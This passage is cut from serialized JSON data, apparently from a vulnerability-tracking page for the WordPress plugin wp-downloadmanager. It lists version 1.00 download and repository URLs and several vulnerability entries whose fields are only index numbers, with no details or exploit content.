rdpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.00&new_path=%2Fwp-downloadmanager%2Ftags%2F1.30",[1221,1222,1223,1224,1225,1226,1227,1228,1229,1230],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1232,"download_url":1233,"svn_tag_url":1234,"released_at":39,"has_diff":55,"diff_files_changed":1235,"diff_lines":39,"trac_diff_url":39,"vulnerabilities":1236,"is_current":55},"1.00","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.00.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.00\u002F",[],[1237,1238,1239,1240,1241,1242,1243,1244,1245,1246],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},
{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107}]